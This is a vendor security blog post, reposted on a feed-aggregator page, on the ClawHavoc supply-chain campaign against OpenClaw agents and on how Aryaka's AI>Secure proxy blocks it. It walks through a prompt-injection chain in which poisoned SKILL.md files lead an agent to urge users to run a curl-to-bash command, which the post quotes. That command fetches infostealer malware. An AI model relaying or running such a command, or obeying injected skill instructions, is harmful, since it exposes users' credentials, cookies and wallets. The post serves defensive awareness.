惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

C
CERT Recently Published Vulnerability Notes
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
WordPress大学
WordPress大学
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
V
Visual Studio Blog
Stack Overflow Blog
Stack Overflow Blog
aimingoo的专栏
aimingoo的专栏
C
Check Point Blog
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
T
Tor Project blog
P
Proofpoint News Feed
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Latest news
Latest news
L
LINUX DO - 热门话题
罗磊的独立博客
T
Tenable Blog
The Hacker News
The Hacker News
美团技术团队
N
Netflix TechBlog - Medium
V
Vulnerabilities – Threatpost
阮一峰的网络日志
阮一峰的网络日志
Last Week in AI
Last Week in AI
博客园 - 司徒正美
Jina AI
Jina AI
Cyberwarzone
Cyberwarzone
云风的 BLOG
云风的 BLOG
S
Secure Thoughts
Cloudbric
Cloudbric
S
Security @ Cisco Blogs
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Microsoft Security Blog
Microsoft Security Blog
Spread Privacy
Spread Privacy
U
Unit 42
雷峰网
雷峰网
C
CXSECURITY Database RSS Feed - CXSecurity.com
Webroot Blog
Webroot Blog
爱范儿
爱范儿
博客园 - 【当耐特】
Know Your Adversary
Know Your Adversary
P
Privacy International News Feed
P
Palo Alto Networks Blog
Google Online Security Blog
Google Online Security Blog
The Last Watchdog
The Last Watchdog
博客园 - 聂微东
Help Net Security
Help Net Security
Hacker News: Ask HN
Hacker News: Ask HN
F
Full Disclosure
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
S
Security Affairs
Project Zero
Project Zero

Aryaka

Secure SD‑WAN And Unified SASE: What AI‑Driven Enterprises Need To Know Before Leaving MPLS How Unified SASE Improves China Connectivity: Performance, Security, And Compliance | Aryaka Blog Why China Connectivity Remains A Major Enterprise Challenge For Global IT Teams | Aryaka Blog The Market Has Spoken (Twice): Why Enterprises Choose Aryaka For SD‑WAN And Unified SASE AI Performance Is A Network Problem, Not Just Compute From ZIP File To Crpx0 Ransomware: Anatomy Of A Multi-Stage Attack Aryaka AI-Ready Network: Why Your WAN Fails For AI Workloads AI Is Redefining Cybersecurity: How CISOs Can Stay Ahead In An AI‑Driven Threat Landscape | Aryaka Blog Aryaka Named Leader In G2 Spring 2026 For SD-WAN & Cloud Security Governing Tens Of Thousands Of AI Agents: Why Policy Chaining Matters For Scalable Runtime Governance | Aryaka Blog Enterprise AI Agent Governance: Build, Deployment & Runtime Explained Is Your Outdated Network Holding Your Business Back? Why Modernization Matters For Cloud, Security, And IT Costs | Aryaka Blog Kernel In The Crosshairs: How The BlackSanta EDR-Killer Campaign Targets Recruitment Workflows | Aryaka Blog Addressing The “God Key” Challenge In Agentic AI For MCP Servers: Why You Need MCP-Aware, AI-Aware ZTNA | Why Browser Security Alone Will Not Protect Us In The Agentic AI Era Aryaka Modern Workplaces Need A New Meaning Of “Site”: How AI>Secure Uses Logical & Physical Sites For Consistent GenAI Security | Aryaka Blog How Modern Security Platforms Organize Rules | SASE & SSE Securing OpenClaw: Why ZTNA Is Critical For Enterprise AI Agent Authentication
Securing OpenClaw Agents From ClawHavoc Supply-Chain Attacks With AI-Driven Protection
2026-02-18 · via Aryaka

Blog 2 Securing OpenClaw Against Banner

As of February 2026, OpenClaw (formerly Clawdbot and Moltbot ) is a popular platform for autonomous AI agents. Its “sovereign” architecture, which gives AI direct access to file systems and terminals, significantly increases its attack surface—leading to elevated risks, most notably illustrated by the ClawHavoc supply-chain campaign, which exposed thousands of deployments to potential compromise.

This article reviews OpenClaw’s vulnerabilities and explains how Aryaka AI>Secure provides robust, multi-layered risk mitigation.

OpenClaw Vulnerabilities & The ClawHavoc Context

OpenClaw is vulnerable due to three main factors:

  • System-Level Access: Agents can execute shell commands and access credentials.
  • Untrusted Ingestion: Agents process third-party content, exposing them to prompt injection.
  • Autonomous Communication: Agents can send data externally without supervision.

ClawHavoc is a supply-chain attack that exploited this ecosystem. In February 2026, researchers discovered about 12% of ClawHub skills were malicious, disguised as useful tools but actually stealing digital identities.

How ClawHavoc Works: The Anatomy of an Infection

ClawHavoc is a stateful, social-engineering attack that exploits the way OpenClaw ingests instructions. It follows a repeatable, highly effective kill chain:

  • Step 1: The Poisoned Manifest (SKILL.md): Attackers upload a skill to ClawHub. The core of the attack is the SKILL.md file. It includes a “Prerequisites” section that tells the agent (and the user) that a specific script must be run to “initialize” the tool.
  • Step 2: Social Engineering via LLM: When you ask your agent to use the skill, it reads the malicious SKILL.md into its context. The LLM then generates a helpful-sounding response: “To enable this feature, please run this command in your terminal: curl -sL https://glot.io/raw/snippet | bash.”
  • Step 3: Malware Payload Delivery: If the user executes the command, it downloads a second-stage payload—typically Atomic Stealer (AMOS) or a keylogger. This malware raids browser cookies, keychains, and the OpenClaw environment files for API keys and crypto wallets.

Using Aryaka AI>Secure to Stop ClawHavoc

As a deep-packet, AI-aware MITM proxy, Aryaka AI>Secure intercepts traffic at every stage of the ClawHavoc attack chain.

Method 1: Blocking the Malicious Skill Download

When a user runs clawhub install, AI>Secure decrypts the HTTPS traffic from the registry.

  • The Protection: It doesn’t just see a file; it parses the Markdown content of the SKILL.md. It uses semantic inspection to identify “Toxic Instructions,” such as hidden shell commands or links to known snippet-sharing sites used in the ClawHavoc campaign.
  • The Result: It blocks the download at the network edge, preventing the malicious instructions from ever reaching the agent’s memory.

Method 2: Response Semantic Filtering (Instruction Defense)

If a bad skill is already on your machine, AI>Secure provides a second layer of defense by inspecting the LLM’s output.

  • The Protection: When the LLM tells the user to “Run this script to enable the tool,” AI>Secure’s semantic engine recognizes this as “Installer Fraud.” It identifies that the AI is being manipulated into tricking a human into a dangerous action.
  • The Result: The proxy redacts the command from the chat stream or blocks the message entirely, replacing it with a security warning in the user’s interface.

Method 3: Proactive URL Filtering & SWG (Payload Defense)

If the user attempts to manually run a malicious curl command or download a “prerequisite” ZIP, AI>Secure’s Secure Web Gateway (SWG) functionality intervenes.

  • The Protection: AI>Secure utilizes a real-time URL Intelligence Feed to track phishing domains and malware-hosting infrastructure.
  • The Result: When the agent or user tries to reach the specific URL hosting the malware payload (like glot.io or webhook.site), the proxy identifies the destination as “Malicious” or “High-Risk” and kills the request instantly. This prevents the actual malware from ever being fetched.

Method 4: Runtime Tool & Data Lockdown

If the malware manages to execute, AI>Secure acts as the final gatekeeper for your data.

  • The Protection: It understands the MCP (Model Context Protocol) calls. If an infected agent tries to execute a shell command to exfiltrate data, AI>Secure identifies the anomalous destination.
  • The Result: Its Next-Gen DLP (Data Loss Prevention) scans all outbound data for “Secrets” (API keys, SSH headers). If it sees your private credentials leaving the network, it terminates the session and alerts the security team.

Conclusion

The ClawHavoc crisis proves that for autonomous agents, the prompt and the skill manifest are the new perimeters. By leveraging an AI-centric proxy like Aryaka AI>Secure, you ensure that your OpenClaw agent remains a tool for productivity rather than a gateway for attackers.